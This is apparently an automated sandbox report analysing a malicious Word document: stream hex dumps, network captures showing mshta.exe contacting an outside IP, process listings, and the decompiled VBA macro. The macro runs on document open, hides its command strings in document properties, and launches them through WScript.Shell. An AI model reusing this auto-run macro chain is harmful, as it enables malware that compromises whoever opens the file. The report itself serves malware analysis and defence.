Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 74 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 bc 00 00 00 06 00 00 00 c8 00 00 00 07 00 00 00 d4 00 00 00 08 00 00 00 e4 00 00 00 09 00 00 00 04 01 00 00 |
Stream Path: 1Table, File Type: data, Stream Size: 7224 |
---|
General | |
---|---|
Stream Path: | 1Table |
File Type: | data |
Stream Size: | 7224 |
Entropy: | 5.92567062364 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . |
Data Raw: | 0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 |
Stream Path: Data, File Type: data, Stream Size: 26648 |
---|
General | |
---|---|
Stream Path: | Data |
File Type: | data |
Stream Size: | 26648 |
Entropy: | 7.93699752134 |
Base64 Encoded: | False |
Data ASCII: | . h . . D . d . . . . . . . . . . . . . . . . . . . . . Z - . % . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . C . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . u . s . _ . . . . . . . . . . . . . . . b . . . . g . . . . . . . \\ u . V . . l o . + I . . . . \\ g . . . . . . D . . . . . . . . n . . T g . . . . . \\ u . V . . l o . + I . . . . P N G . . . . . . . . I H D R . . . . . . . . . . . . . . . . . . . . . g I F x N E |
Data Raw: | 18 68 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 5a 2d 20 0d 25 03 25 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 44 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 20 00 00 00 04 41 01 00 00 00 05 c1 08 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 75 00 73 00 |
Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 398 |
---|
General | |
---|---|
Stream Path: | Macros/PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 398 |
Entropy: | 5.34409853619 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 6 6 C 4 7 8 6 9 - 5 3 2 7 - 4 B B 0 - A 8 5 4 - 1 C 9 A 9 1 5 0 0 5 8 1 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = m a i n . . N a m e = " a t J H O i j " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A C A E 3 F 7 6 4 1 A 9 4 5 A 9 4 5 A 9 4 5 A 9 4 5 " . . D P B = " E 3 E 1 7 0 4 3 A 6 4 4 A 6 4 4 A 6 " . . G C = " 1 A 1 8 8 9 9 C C 1 9 D C 1 9 D 3 E " . . . . [ H o s t E x t |
Data Raw: | 49 44 3d 22 7b 36 36 43 34 37 38 36 39 2d 35 33 32 37 2d 34 42 42 30 2d 41 38 35 34 2d 31 43 39 41 39 31 35 30 30 35 38 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 6d 61 69 6e 0d 0a 4e 61 6d 65 3d 22 61 74 4a 48 4f 69 6a 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 |
Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 56 |
---|
General | |
---|---|
Stream Path: | Macros/PROJECTwm |
File Type: | data |
Stream Size: | 56 |
Entropy: | 3.05665670746 |
Base64 Encoded: | False |
Data ASCII: | T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . m a i n . m . a . i . n . . . . . |
Data Raw: | 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 6d 61 69 6e 00 6d 00 61 00 69 00 6e 00 00 00 00 00 |
Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2896 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 2896 |
Entropy: | 4.3263453539 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . |
Data Raw: | cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 1708 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/__SRP_0 |
File Type: | data |
Stream Size: | 1708 |
Entropy: | 3.55295478383 |
Base64 Encoded: | False |
Data ASCII: | . K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . A . < . M . . @ . Y . . . J . . . . . . . . . . . . . |
Data Raw: | 93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 |
Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 241 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/__SRP_1 |
File Type: | data |
Stream Size: | 241 |
Entropy: | 2.39835412071 |
Base64 Encoded: | False |
Data ASCII: | r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . i 7 C o m p u t e r M o n i t o r . . . . . . . . . . . . . . . . m o u s e V i d e o T . . . . . . . . . . . . . . . |
Data Raw: | 72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00 |
Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 983 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/__SRP_2 |
File Type: | data |
Stream Size: | 983 |
Entropy: | 2.01453026658 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ) . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 72 55 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 04 00 04 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07 |
Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 364 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/__SRP_3 |
File Type: | data |
Stream Size: | 364 |
Entropy: | 2.2617201917 |
Base64 Encoded: | False |
Data ASCII: | r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . P . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . O . P . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 40 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 04 01 e1 0d ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 |
Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 553 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/dir |
File Type: | data |
Stream Size: | 553 |
Entropy: | 6.34791185753 |
Base64 Encoded: | True |
Data ASCII: | . % . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . . c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . . . m . . |
Data Raw: | 01 25 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 ef b5 c2 63 0e 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 |
Stream Path: WordDocument, File Type: data, Stream Size: 19522 |
---|
General | |
---|---|
Stream Path: | WordDocument |
File Type: | data |
Stream Size: | 19522 |
Entropy: | 3.66495069994 |
Base64 Encoded: | False |
Data ASCII: | . . . . U . . . . . . . . . . . . . . . . . . . . . . . j G . . . . b j b j . n . n . . . . . . . . . . . . . . . . . . . . . . . L . . . . . a . . . a j ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > . . . . . . . > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | ec a5 c1 00 55 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 6a 47 00 00 0e 00 62 6a 62 6a eb 6e eb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 4c 00 00 89 04 e9 61 89 04 e9 61 6a 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 |
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 31, 2021 12:22:32.349703074 CET | 49165 | 80 | 192.168.2.22 | 45.67.229.54 |
Dec 31, 2021 12:22:32.404272079 CET | 80 | 49165 | 45.67.229.54 | 192.168.2.22 |
Dec 31, 2021 12:22:32.404408932 CET | 49165 | 80 | 192.168.2.22 | 45.67.229.54 |
Dec 31, 2021 12:22:32.406516075 CET | 49165 | 80 | 192.168.2.22 | 45.67.229.54 |
Dec 31, 2021 12:22:32.461103916 CET | 80 | 49165 | 45.67.229.54 | 192.168.2.22 |
Dec 31, 2021 12:22:32.679847956 CET | 80 | 49165 | 45.67.229.54 | 192.168.2.22 |
Dec 31, 2021 12:22:32.680103064 CET | 49165 | 80 | 192.168.2.22 | 45.67.229.54 |
Dec 31, 2021 12:22:37.685368061 CET | 80 | 49165 | 45.67.229.54 | 192.168.2.22 |
Dec 31, 2021 12:22:37.685446024 CET | 49165 | 80 | 192.168.2.22 | 45.67.229.54 |
Dec 31, 2021 12:22:38.037445068 CET | 49165 | 80 | 192.168.2.22 | 45.67.229.54 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 31, 2021 12:22:32.286535025 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8 |
Dec 31, 2021 12:22:32.318128109 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Dec 31, 2021 12:22:32.286535025 CET | 192.168.2.22 | 8.8.8.8 | 0xe95f | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Dec 31, 2021 12:22:32.318128109 CET | 8.8.8.8 | 192.168.2.22 | 0xe95f | No error (0) | 45.67.229.54 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 45.67.229.54 | 80 | C:\Windows\SysWOW64\mshta.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 31, 2021 12:22:32.406516075 CET | 1 | OUT | |
Dec 31, 2021 12:22:32.679847956 CET | 1 | IN |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 12:23:12 |
Start date: | 31/12/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f630000 |
File size: | 1423704 bytes |
MD5 hash: | 9EE74859D22DAE61F1750B3A1BACB6F5 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 12:23:17 |
Start date: | 31/12/2021 |
Path: | C:\Windows\explorer.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffa10000 |
File size: | 3229696 bytes |
MD5 hash: | 38AE1B3C38FAEF56FE4907922F0385BA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 12:23:18 |
Start date: | 31/12/2021 |
Path: | C:\Windows\explorer.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffa10000 |
File size: | 3229696 bytes |
MD5 hash: | 38AE1B3C38FAEF56FE4907922F0385BA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 12:23:18 |
Start date: | 31/12/2021 |
Path: | C:\Windows\SysWOW64\mshta.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xea0000 |
File size: | 13312 bytes |
MD5 hash: | ABDFC692D9FE43E2BA8FE6CB5A8CB95A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Graph
- Entrypoint
- Decryption Function
- Executed
- Not Executed
- Show Help
Module: ThisDocument |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "ThisDocument" |
2 | Attribute VB_Base = "1Normal.ThisDocument" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = True |
8 | Attribute VB_Customizable = True |
Executed Functions |
---|
APIs | Meta Information |
---|---|
exec | IWshShell3.exec( |
Part of subcall function cont1@ThisDocument: BuiltInDocumentProperties |
Strings | Decrypted Strings |
---|---|
"category" | |
"company" | |
"wsc" |
Line | Instruction | Meta Information |
---|---|---|
18 | Public Function srn1(mouseVideo) | |
19 | CreateObject("wsc" + cont1("company") + "ell").exec cont1("category") + " " + mouseVideo | IWshShell3.exec( |
20 | End Function |
APIs | Meta Information |
---|---|
Part of subcall function hny@main: Trim | |
Part of subcall function hny@main: SaveAs2 |
Line | Instruction | Meta Information |
---|---|---|
21 | Sub Document_Open() | |
22 | hny | executed |
23 | End Sub |
APIs | Meta Information |
---|---|
Execute |
Strings | Decrypted Strings |
---|---|
"""" | |
"s3x" |
Line | Instruction | Meta Information |
---|---|---|
9 | Function contents() | |
10 | With ActiveDocument.Content | executed |
11 | superI7Center = . Find.Execute(FindText := "s3x", ReplaceWith := "", Replace := 2) | Execute |
12 | End With | |
13 | End Function |
APIs | Meta Information |
---|---|
BuiltInDocumentProperties | |
Part of subcall function contents@ThisDocument: Execute |
Line | Instruction | Meta Information |
---|---|---|
14 | Function cont1(i7ComputerMonitor) | |
15 | cont1 = ActiveDocument.BuiltInDocumentProperties(i7ComputerMonitor).Value | BuiltInDocumentProperties executed |
16 | contents | |
17 | End Function |
Module: main |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "main" |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Trim | |
Part of subcall function cont1@ThisDocument: BuiltInDocumentProperties | |
SaveAs2 | |
Part of subcall function srn1@ThisDocument: exec |
Strings | Decrypted Strings |
---|---|
"comments" | |
"i7Gigabyte.h" |
Line | Instruction | Meta Information |
---|---|---|
2 | Public Sub hny() | |
3 | processorI9 = Trim("i7Gigabyte.h" & ThisDocument.cont1("comments")) | Trim executed |
4 | ActiveDocument.SaveAs2 FileName := processorI9, FileFormat := 2 | SaveAs2 |
5 | ThisDocument.srn1 processorI9 | |
6 | End Sub |